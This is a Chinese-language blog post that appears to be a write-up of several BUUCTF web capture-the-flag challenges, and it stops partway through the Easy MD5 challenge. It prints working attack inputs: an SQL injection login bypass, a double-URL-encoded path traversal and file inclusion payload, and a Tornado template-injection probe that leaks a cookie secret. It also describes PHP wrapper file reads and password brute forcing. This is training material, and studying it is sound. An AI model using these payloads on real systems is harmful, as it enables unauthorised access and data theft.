<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="[极客大挑战 2019]EasySQL进入直接是一个用户登陆界面  首先我们可以直接进行尝试万能密码进行登陆1’ or 1&#x3D;1#,果然直接获取了flag。  [HCTF 2018]WarmUp（php 代码审计） 进入界面直接给了一张图片其余啥也没有  直接查看源代码 1234567891011121314&lt;!DOCTYPE html&gt;&lt;html lang&#x3D;&quot;">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2022/03/24/BUUCTF%20WEB%20WP/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="[极客大挑战 2019]EasySQL进入直接是一个用户登陆界面  首先我们可以直接进行尝试万能密码进行登陆1’ or 1&#x3D;1#,果然直接获取了flag。  [HCTF 2018]WarmUp（php 代码审计） 进入界面直接给了一张图片其余啥也没有  直接查看源代码 1234567891011121314&lt;!DOCTYPE html&gt;&lt;html lang&#x3D;&quot;">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316162317854.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316162520494.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316162904144.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316170439373.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316193344015.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316193857590.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316194039247.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316194418207.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316194813884.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316194913383.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316195502829.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316195647653.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317192344749.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317192450860.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317192611106.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317211725386.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317211958029.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317212130357.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317213901715.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317213659964.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316222021496.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316222102619.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316222338060.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316222440391.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316232433547.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316232702361.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316234335675.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316234508381.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316235510043.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316235923228.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317000207148.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317004351448.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317004958983.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317005045646.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317011758179.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317015120955.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317015333603.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317015518520.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317015642645.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317015830348.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317021718680.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317134648674.png![image-20220317145051125](C:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317145051125.png![image-20220317145323444](C:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317145323444.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317145622095.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317145458072.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317231219152.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317231240037.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317214823510.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317214933252.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317215121478.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317215133380.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317232303094.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220317233448553.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220318004435946.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220318004733310.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220318004804819.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220318004823352.png">
<meta property="og:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220318010542832.png">
<meta property="article:published_time" content="2022-03-23T17:01:46.039Z">
<meta property="article:modified_time" content="2022-03-18T06:57:12.694Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:/Users/孙春扬/AppData/Roaming/Typora/typora-user-images/image-20220316162317854.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://example.com/2022/03/24/BUUCTF WEB WP/"/>





  <title> | Hexo</title>
  








<meta name="generator" content="Hexo 6.1.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/03/24/BUUCTF%20WEB%20WP/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline"></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2022-03-24T01:01:46+08:00">
                2022-03-24
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="极客大挑战-2019-EasySQL"><a href="#极客大挑战-2019-EasySQL" class="headerlink" title="[极客大挑战 2019]EasySQL"></a>[极客大挑战 2019]EasySQL</h2><p>进入直接是一个用户登陆界面</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316162317854.png" alt="image-20220316162317854"></p>
<p>首先我们可以直接进行尝试万能密码进行登陆1’ or 1&#x3D;1#,果然直接获取了flag。</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316162520494.png" alt="image-20220316162520494"></p>
<h2 id=""><a href="#" class="headerlink" title=""></a></h2><h2 id="HCTF-2018-WarmUp"><a href="#HCTF-2018-WarmUp" class="headerlink" title="[HCTF 2018]WarmUp"></a>[HCTF 2018]WarmUp</h2><p>（php 代码审计）</p>
<p>进入界面直接给了一张图片其余啥也没有</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316162904144.png" alt="image-20220316162904144"></p>
<p>直接查看源代码</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">&quot;viewport&quot;</span> <span class="attr">content</span>=<span class="string">&quot;width=device-width, initial-scale=1.0&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">&quot;X-UA-Compatible&quot;</span> <span class="attr">content</span>=<span class="string">&quot;ie=edge&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>Document<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!--source.php--&gt;</span></span><br><span class="line">    </span><br><span class="line">    <span class="tag">&lt;<span class="name">br</span>&gt;</span><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg&quot;</span> /&gt;</span><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>发现source.php文件，直接进行访问</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">emmm</span>   // 定义<span class="title">emmm</span>类</span></span><br><span class="line"><span class="class">    </span>&#123;</span><br><span class="line">        <span class="keyword">public</span> <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">checkFile</span>(<span class="params">&amp;<span class="variable">$page</span></span>)  // 将调用函数时穿的值复制给$<span class="title">page</span> </span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line"> </span><br><span class="line">            <span class="variable">$whitelist</span> = [<span class="string">&quot;source&quot;</span>=&gt;<span class="string">&quot;source.php&quot;</span>,<span class="string">&quot;hint&quot;</span>=&gt;<span class="string">&quot;hint.php&quot;</span>];  <span class="comment">// 定义一个白名单  </span></span><br><span class="line">            <span class="keyword">if</span> (! <span class="keyword">isset</span>(<span class="variable">$page</span>) || !<span class="title function_ invoke__">is_string</span>(<span class="variable">$page</span>)) &#123;</span><br><span class="line">                <span class="comment">/* 必须满足下面两个条件才不会 return false。</span></span><br><span class="line"><span class="comment">                  1. $page的值不为空</span></span><br><span class="line"><span class="comment">                  2. $page的值是一个字符串</span></span><br><span class="line"><span class="comment">                  这个在外层就已经判断过了。又重新判断了一次。</span></span><br><span class="line"><span class="comment">                */</span></span><br><span class="line">                <span class="keyword">echo</span> <span class="string">&quot;you can&#x27;t see it&quot;</span>;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            </span><br><span class="line">            <span class="comment">// 判断$page的值是否在白名单中,如果在白名单中直接返回true。</span></span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;   <span class="comment">//true</span></span><br><span class="line">            &#125;</span><br><span class="line">             </span><br><span class="line">            <span class="comment">/* </span></span><br><span class="line"><span class="comment">            mb_substr() 获取部分字符串  其参数mb_substr(&#x27;待提取的字符串&#x27;,&#x27;开始的位置。0表示从头开始&#x27;,&#x27;截取的长度&#x27;)</span></span><br><span class="line"><span class="comment">            mb_substr() 函数的前两个参数都是固定的值。而截取的长度则是使用了mb_strpos()函数计算。</span></span><br><span class="line"><span class="comment">            mb_strpos() 查找字符串在另一个字符串中首次出现的位置 其参数mb_strpos(&#x27;要被检查的字符串&#x27;,&#x27;从何处查字符串&#x27;)</span></span><br><span class="line"><span class="comment">            */</span></span><br><span class="line">            <span class="variable">$_page</span> = <span class="title function_ invoke__">mb_substr</span>( // 该代码表示截取<span class="variable">$page</span>中<span class="string">&#x27;?&#x27;</span>前部分，若无则截取整个<span class="variable">$page</span></span><br><span class="line">                <span class="variable">$page</span>,</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                <span class="title function_ invoke__">mb_strpos</span>(<span class="variable">$page</span> . <span class="string">&#x27;?&#x27;</span>, <span class="string">&#x27;?&#x27;</span>) </span><br><span class="line">            );</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">            <span class="comment">// 这里和上面一样，查看$_page是否在白名单中。是则返回true</span></span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$_page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line"> </span><br><span class="line">            <span class="variable">$_page</span> = <span class="title function_ invoke__">urldecode</span>(<span class="variable">$page</span>);  <span class="comment">// 对$page进行一次url解码</span></span><br><span class="line">            <span class="variable">$_page</span> = <span class="title function_ invoke__">mb_substr</span>(  // 获取?   ?中间的内容</span><br><span class="line">                <span class="variable">$_page</span>,</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                <span class="title function_ invoke__">mb_strpos</span>(<span class="variable">$_page</span> . <span class="string">&#x27;?&#x27;</span>, <span class="string">&#x27;?&#x27;</span>)</span><br><span class="line">            );</span><br><span class="line">            <span class="comment">// 判断$page的值是否在白名单中,如果在白名单中直接返回true。</span></span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$_page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;you can&#x27;t see it&quot;</span>;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">            <span class="keyword">if</span> (! <span class="keyword">empty</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>])    <span class="comment">// $REQUEST[&#x27;file&#x27;] 非空</span></span><br><span class="line">                    &amp;&amp; <span class="title function_ invoke__">is_string</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>])   <span class="comment">// $REQUEST[&#x27;file&#x27;] 是一个字符串</span></span><br><span class="line">                    &amp;&amp; emmm::<span class="title function_ invoke__">checkFile</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>]) <span class="comment">// 能够通过checkFile()函数的校验</span></span><br><span class="line">                ) &#123;</span><br><span class="line">                    <span class="keyword">include</span> <span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>];  <span class="comment">// 上面的if语句为true  则包含$_REQUEST[&#x27;file&#x27;]文件。</span></span><br><span class="line">                    <span class="keyword">exit</span>;  <span class="comment">// 退出代码执行</span></span><br><span class="line">                &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;</span>;  <span class="comment">//  //打印滑稽表情</span></span><br><span class="line">                &#125;  </span><br></pre></td></tr></table></figure>

<p>看到一段源码，尝试分析，可以知道只有($_REQUEST[‘file’]值为source.php”,”hint.php”才能通过，先试一下得到flag在ffffllllaaaagggg中</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316170439373.png" alt="image-20220316170439373"></p>
<p>继续看代码</p>
<p>第一个if说$page必须不为空并且位字符串才为true</p>
<p>第二个if说$page在白名单中才为true</p>
<p>第三个if说截取$page中？前面的字符串并且在白名单中才为真</p>
<p>第四个if说$page经过url解码并且截取到？前面的内容在白名单中则为true</p>
<p>因为四个if语句中。使用了urldecode()函数对url进行解码。所以我们可以使用双重编码(也就是将一个字符串编码两次)。被两次编码之后的?号，经过包含的时候会把包含的文件当做一个目录。</p>
<p>因为payload在发往服务器是会进行一次url解码，所以经过两次编码之后，先在服务端进行第一次解码，然后会在代码里再进行第二次解码变成了？。</p>
<p>所以构造payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?file=hint.php%253F../../../../../ffffllllaaaagggg</span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316193344015.png" alt="image-20220316193344015"></p>
<h2 id="极客大挑战-2019-Havefun"><a href="#极客大挑战-2019-Havefun" class="headerlink" title="[极客大挑战 2019]Havefun"></a>[极客大挑战 2019]Havefun</h2><p>进入主页只有一只动态猫，直接ctrl+u查看源代码</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316193857590.png" alt="image-20220316193857590"></p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316194039247.png" alt="image-20220316194039247"></p>
<p>看到一串源代码，通过源码，我们构造payload,获得flag</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">？cat=dog</span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316194418207.png" alt="image-20220316194418207"></p>
<h2 id="ACTF2020-新生赛-Include"><a href="#ACTF2020-新生赛-Include" class="headerlink" title="[ACTF2020 新生赛]Include"></a>[ACTF2020 新生赛]Include</h2><p>进入首页，点击tips查看</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316194813884.png" alt="image-20220316194813884"></p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316194913383.png" alt="image-20220316194913383"></p>
<p>可以看到url变了，又根据题目提示include，可以想到利用文件包含的知识来解决，先利用PHP伪协议尝试一下。<img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316195502829.png" alt="image-20220316195502829"></p>
<p>直接base64进行解码，获得flag。<img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316195647653.png" alt="image-20220316195647653"></p>
<h2 id="护网杯-2018-easy-tornado"><a href="#护网杯-2018-easy-tornado" class="headerlink" title="[护网杯 2018]easy_tornado"></a>[护网杯 2018]easy_tornado</h2><p>进入界面，看到三个超链接。<img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317192344749.png" alt="image-20220317192344749"></p>
<p>flag.txt里告诉我们flag在&#x2F;fllllllllllllag文件里<img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317192450860.png" alt="image-20220317192450860"></p>
<p>welcome.txt里面有一个render，并不知道是什么。由大佬博客可知题目是easy_tornado，&#x2F;welcome.txt页面也看到render，可能会是SSTI模板注入。<a target="_blank" rel="noopener" href="https://blog.csdn.net/zz_Caleb/article/details/96480967">SSTI模块注入详解</a></p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317192611106.png" alt="image-20220317192611106"></p>
<p><a target="_blank" rel="noopener" href="https://my.oschina.net/u/4278523/blog/3392955">[python SSTI tornado render模板注入]</a></p>
<p>hints.txt里面</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317211725386.png" alt="image-20220317211725386"></p>
<p>从上面三个页面来看</p>
<ul>
<li><p>flag在md5(cookie_secret+md5(filename))文件中</p>
</li>
<li><p>url中的filehash是md5(cookie_secret+md5(filename))</p>
<p>需要cookie_secret,依据大佬博客可以知道可以利用传递error?msg&#x3D;{undefined{ handler.settings }}得到：<img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317211958029.png" alt="image-20220317211958029"><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317212130357.png" alt="image-20220317212130357"></p>
<p>cookie_secret:3daf59e6-4f35-4bae-afc8-210d2222d58a</p>
<p>直接进行在线md5加密</p>
<p>md5(filename):3bf9f6cf685a6dd8defadabfb41a03a1</p>
<p>md5(cookie_secret+md5(filename)):b1be47d7d648510d9dc93dcc6b37c4e6</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317213901715.png" alt="image-20220317213901715"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//payload:?filename=/fllllllllllllag&amp;filehash=b1be47d7d648510d9dc93dcc6b37c4e6</span></span><br><span class="line"><span class="comment">//输入payload获取flag。</span></span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220317213659964.png" alt="image-20220317213659964"></p>
</li>
</ul>
<h2 id="HCTF-2018-admin"><a href="#HCTF-2018-admin" class="headerlink" title="[HCTF 2018]admin"></a>[HCTF 2018]admin</h2><p>进入主页，看到右上角的登陆和注册按钮，先尝试点击登陆按钮，随便输入admin和密码123456</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316222021496.png" alt="image-20220316222021496"></p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316222102619.png" alt="image-20220316222102619"></p>
<p>首先我尝试进行抓包弱口令爆破。可以看到爆破成功，登陆获得flag。<img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316222338060.png" alt="image-20220316222338060"></p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316222440391.png" alt="image-20220316222440391"></p>
<h2 id="BJDCTF2020-Easy-MD5"><a href="#BJDCTF2020-Easy-MD5" class="headerlink" title="[BJDCTF2020]Easy MD5"></a>[BJDCTF2020]Easy MD5</h2><p>打开界面猜测是sql注入，但是进行万能密码做，发现并没有任何的用。所以尝试进行bp抓包。</p>
<p><img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316232433547.png" alt="image-20220316232433547"></p>
<p>惊喜的发现的一段SQL语句。可是不懂啥意思，看到大佬的博客发现，这里是绕过md5进行注入。<img src="C:\Users\孙春扬\AppData\Roaming\Typora\typora-user-images\image-20220316232702361.png" alt="image-20220316232702361"></p>
